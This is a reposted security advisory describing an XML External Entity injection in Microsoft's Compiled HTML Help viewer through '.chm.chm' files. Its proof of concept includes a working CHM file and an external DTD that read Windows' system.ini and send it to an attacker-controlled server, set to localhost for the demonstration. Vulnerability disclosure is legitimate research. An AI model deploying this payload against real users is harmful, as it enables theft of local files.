• Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity


    [+] Credits: John Page (aka hyp3rlinx)
    [+] Website: hyp3rlinx.altervista.org
    [+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
    [+] ISR: ApparitionSec         


    [Vendor]
    www.microsoft.com


    [Product]
    Microsoft Compiled HTML Help "hh.exe"

    Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools.
    The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation.
    CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.


    [Vulnerability Type]
    Uncompiled .CHM File XML External Entity Injection


    [CVE Reference]
    N/A


    [Security Issue]
    CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this program and create them easily by
    simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it processing any JS/HTML/XML inside etc.
    Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.

    Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without
    having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

    While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I thought this was an interesting way to
    create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.

    Note: User interaction is required to exploit this vulnerability.


    [Exploit/POC]
    1) python -m SimpleHTTPServer


    2) "XXE.chm.chm"

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
    <HTML>
    <HEAD>
    <Title>Uncompiled CHM File XXE PoC</Title>
    </HEAD>
    <BODY>
    <xml>
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE tastyexploits [
    <!ENTITY % file SYSTEM "C:Windowssystem.ini">
    <!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
    %dtd;]>
    <pwn>&send;</pwn>
    </xml>
    </BODY>
    </HTML>


    3) "payload.dtd"  (hosted in python web-server dir port 8000 above)

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
    %all;


    Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.

    Tested successfully Windows 7/10


    [POC Video URL]
    https://www.youtube.com/watch?v=iaxp1iBDWXY


    [Network Access]
    Remote



    [Severity]
    High


    [Disclosure Timeline]
    Vendor Notification: April 25, 2019
    MSRC Response: "We determined that this behavior is considered to be by design"
    July 16, 2019 : Public Disclosure



    [+] Disclaimer
    The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
    Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
    that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
    is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
    for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
    or exploits by the author or elsewhere. All content (c).

    hyp3rlinx

  • 相关阅读:
    爬取药智网中的方剂信息
    日报3.13
    数据库添加出错
    Bencode
    一些安全网络协议
    代码质量不重要
    Jordan Peterson
    随身记录的缺点
    Why is Go PANICking?
    go问
  • 原文地址:https://www.cnblogs.com/iAmSoScArEd/p/11458758.html
Copyright © 2020-2023  润新知